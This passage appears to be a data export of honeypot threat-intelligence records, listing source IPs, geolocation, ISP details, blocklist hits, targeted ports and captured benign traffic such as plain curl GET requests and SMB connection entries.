    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;49969&amp;&amp;13076&amp;&amp;23&amp;&amp;9100&amp;&amp;41050&amp;&amp;47653"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de4:a36f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3466"/>
    <x v="3466"/>
    <s v="187-110-138-130.vbtelecom.net.br"/>
    <x v="0"/>
    <d v="2025-04-02T23:47:01"/>
    <d v="2025-04-02T23:47:01"/>
    <d v="2025-04-02T23:47:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="São Gonçalo do Sapucaí"/>
    <s v="São Gonçalo do Sapucaí"/>
    <s v="3449056"/>
    <s v="NA"/>
    <s v="-21.8922"/>
    <s v="-45.5953"/>
    <s v="53127"/>
    <s v="AS53127"/>
    <s v="VB Telecom Com. e Serv. de Info Ltda"/>
    <s v="corporate"/>
    <s v="VB Telecom Com. e Serv. de Info Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb6e:8a82"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3467"/>
    <x v="3467"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T23:44:16"/>
    <d v="2025-02-21T06:02:37"/>
    <d v="2025-04-02T23:44:16"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kabupaten Karawang"/>
    <s v="Rengasdengklok"/>
    <s v="1629710"/>
    <s v="NA"/>
    <s v="-6.11672"/>
    <s v="107.273"/>
    <s v="151542"/>
    <s v="PT Sahabat Fiber Indonesia"/>
    <s v="PT Sahabat Fiber Indonesia"/>
    <s v="residential"/>
    <s v="PT Sahabat Fiber Indonesia"/>
    <s v="2023-07-28"/>
    <s v="IDNIC-SAFINDO-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f4:6b51"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3468"/>
    <x v="3468"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T23:39:34"/>
    <d v="2024-03-20T02:58:44"/>
    <d v="2025-04-02T23:39:34"/>
    <n v="411"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;46715&amp;&amp;23&amp;&amp;57812&amp;&amp;52414&amp;&amp;52398&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-12-08"/>
    <s v="TINP-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:cb32"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3469"/>
    <x v="3469"/>
    <s v="27-96-240-204.veetime.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T23:36:48"/>
    <d v="2024-04-16T13:25:13"/>
    <d v="2025-04-02T23:36:48"/>
    <n v="307"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;62872&amp;&amp;7253&amp;&amp;23&amp;&amp;2938&amp;&amp;58425&amp;&amp;80&amp;&amp;9100&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']}"/>
    <n v="61"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="17809"/>
    <s v="VEE TIME CORP."/>
    <s v="EMAX"/>
    <s v="business"/>
    <s v="VMAX Telecom Co., Ltd"/>
    <s v="2011-03-04"/>
    <s v="VMAX-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2009-11-27 10:29:39"/>
    <s v="2027-11-27 10:29:39"/>
    <s v="2024-09-30 09:33:59"/>
    <s v="['NS1.EMAX.NET.TW', 'NS2.EMAX.NET.TW']"/>
    <s v="Net-Chinese Co., Ltd."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="14"/>
    <s v="NA"/>
    <s v="REDACTED FOR PRIVACY"/>
    <s v="::ffff:1b60:f0cc"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3470"/>
    <x v="3470"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T23:29:50"/>
    <d v="2025-04-02T23:04:35"/>
    <d v="2025-04-02T23:29:50"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:16d3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3471"/>
    <x v="3471"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T22:59:31"/>
    <d v="2024-11-29T18:07:06"/>
    <d v="2025-04-02T22:59:31"/>
    <n v="69"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_SMB_H11"/>
    <s v="3306&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt Ltd"/>
    <s v="2004-09-21"/>
    <s v="CableLite"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,48139)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,48142)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,64365)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,52761)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,56250)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,26494)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,64440)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,59805)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,60838)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,54740)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,54753)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,55357)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,23387)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,23395)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,54834)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,64851)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,64853)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,65178)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,51448)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,51485)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,51942)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,42424)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,42472)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,51704)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,52109)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,60423)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,60446)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,60823)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,54847)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca53:1069"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3472"/>
    <x v="3472"/>
    <s v="NA&amp;&amp;114-33-1-240.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T22:57:27"/>
    <d v="2024-09-10T01:10:00"/>
    <d v="2025-04-02T22:57:27"/>
    <n v="235"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_SSH_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;62284&amp;&amp;9100"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7221:1f0"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3473"/>
    <x v="3473"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T22:33:16"/>
    <d v="2023-08-29T10:36:57"/>
    <d v="2025-04-02T22:33:16"/>
    <n v="118"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H42&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="913&amp;&amp;3306&amp;&amp;445&amp;&amp;55460&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="None&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f6:6403"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3474"/>
    <x v="3474"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T22:30:01"/>
    <d v="2025-02-16T20:56:02"/>
    <d v="2025-04-02T22:30:01"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:54db"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3475"/>
    <x v="3475"/>
    <s v="NA&amp;&amp;114-32-184-112.hinet-ip.hinet.net"/>
    <x v="0"/>
